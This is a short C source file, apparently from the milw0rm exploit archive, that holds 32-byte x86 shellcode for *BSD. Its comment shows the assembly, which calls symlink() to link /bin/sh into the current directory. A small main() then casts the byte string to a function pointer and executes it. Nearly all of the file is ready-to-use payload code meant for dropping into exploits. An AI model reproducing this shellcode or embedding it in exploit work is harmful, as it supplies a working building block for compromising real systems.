/*The shellcode calls the symlink() and makes the link to the /bin/sh in the current dir. short version size = 32 bytes OS = *BSD written by /rootteam/dev0id (www.sysworld.net) dev0id@uncompiled.com BITS 32 jmp short callme main: pop esi xor eax,eax mov byte [esi+7],al lea ebx,[esi+5] push ebx lea ebx,[esi] push ebx mov al,57 push eax int 0x80 callme: call main db '/bin/sh' */ char shellcode[] = "\xeb\x12\x5e\x31\xc0\x88\x46\x07\x8d\x5e\x05\x53\x8d\x1e\x53" "\xb0\x39\x50\xcd\x80\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f" "\x73\x68"; int main (void) { void (*code)(void); code=(void(*)())shellcode; (void)code(); return 0; } // milw0rm.com [2004-09-26]